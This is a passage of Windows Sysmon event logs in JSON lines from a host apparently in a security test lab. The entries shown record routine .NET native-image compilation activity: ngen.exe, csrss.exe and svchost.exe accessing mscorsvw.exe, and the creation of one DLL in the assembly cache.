\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6373,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:15.118\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-043B-5F25-0000-0010AED10B00}\r\nTargetProcessId: 4924\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:15.118","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-043B-5F25-0000-0010AED10B00}","TargetProcessId":"4924","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6374,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:15.134\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-043B-5F25-0000-0010AED10B00}\r\nTargetProcessId: 4924\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:15.134","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-043B-5F25-0000-0010AED10B00}","TargetProcessId":"4924","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6375,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:15.149\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-043B-5F25-0000-001090D40B00}\r\nTargetProcessId: 4580\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:15.149","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-043B-5F25-0000-001090D40B00}","TargetProcessId":"4580","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6376,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:15.149\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-043B-5F25-0000-001090D40B00}\r\nTargetProcessId: 4580\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:15.149","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-043B-5F25-0000-001090D40B00}","TargetProcessId":"4580","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6377,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:15.165\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-043B-5F25-0000-001090D40B00}\r\nTargetProcessId: 4580\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:15.165","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-043B-5F25-0000-001090D40B00}","TargetProcessId":"4580","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6378,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:57:15.212\r\nProcessGuid: {A837DB8D-043B-5F25-0000-001090D40B00}\r\nProcessId: 4580\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11e4-0\\Accessibility.dll\r\nCreationUtcTime: 2020-08-01 05:57:15.212","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:57:15.212","ProcessGuid":"{A837DB8D-043B-5F25-0000-001090D40B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11e4-0\\Accessibility.dll","CreationUtcTime":"2020-08-01 05:57:15.212","EventReceivedTime":"2020-08-01 05:57:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6379,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:15.243\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0425-5F25-0000-00104C8E0B00}\r\nTargetProcessId: 4604\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:15.243","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0425-5F25-0000-00104C8E0B00}","TargetProcessId":"4604","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6380,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:15.243\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0425-5F25-0000-00104C8E0B00}\r\nTargetProcessId: 4604\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:15.243","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0425-5F25-0000-00104C8E0B00}","TargetProcessId":"4604","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6381,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:15.243\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0425-5F25-0000-00104C8E0B00}\r\nTargetProcessId: 4604\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:15.243","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0425-5F25-0000-00104C8E0B00}","TargetProcessId":"4604","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
